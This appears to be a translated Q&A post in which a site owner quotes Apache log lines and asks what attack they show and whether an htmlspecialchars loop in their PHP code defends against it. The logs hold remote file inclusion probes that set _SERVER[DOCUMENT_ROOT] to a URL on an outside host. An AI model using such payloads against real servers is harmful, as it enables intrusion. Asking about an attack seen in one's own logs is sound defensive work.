【发布时间】:2015-10-11 22:35:25
【问题描述】:
在我的 Apache 错误日志中,我发现以下行:
[Fri Jul 17 22:15:48.632018 2015] [:error] [pid 2784:tid 1048] [client 97.74.24.134:57050] PHP Warning: htmlspecialchars() expects parameter 1 to be string, array given in C:\\Apache24\\htdocs\\catalog\\private\\class\\ResolvedQuery.class.php on line 361
这条线重复了几次。
在我的访问日志中,我发现了以下请求:
97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&sa=U&ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 448
97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&%3bsa=U&%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&sa=U&ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 472
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&%3bsa=U&%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:56 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 38779
97.74.24.134 - - [17/Jul/2015:22:15:59 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:00 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:03 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 320
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:07 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 344
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET / HTTP/1.1" 200 12875
我使用 .htaccess 文件将所有请求定向到 index.php 文件中。 从那时起,我会这样处理请求:
$query = str_replace('_url=/', '', $_SERVER['QUERY_STRING']);
从此我对$query做一些操作。
触发错误的代码部分如下:
//sanitize requests array.
if (!empty($_REQUEST)){
foreach($_REQUEST as $req => $value){
$p = htmlspecialchars($req);
$v = htmlspecialchars($value); // THIS LINE TRIGGERS THE ERROR!
$this->requests[$p] = $v;
}
}
现在,这是一种什么样的攻击?此处提供的代码是否可以保护我免受这种攻击?如果没有,我必须做些什么来防止这种攻击?
我在 Win7 上使用 Apache 2.4、php 5.6
【问题讨论】:
-
如何初始化
$value?不确定这是攻击还是错误。 -
看起来他们正在尝试包含来自外部域的内容,而 htmlspecialchars 对附加到查询字符串的 url 没有任何作用。 index.php 文件是否允许以任何方式包含文件?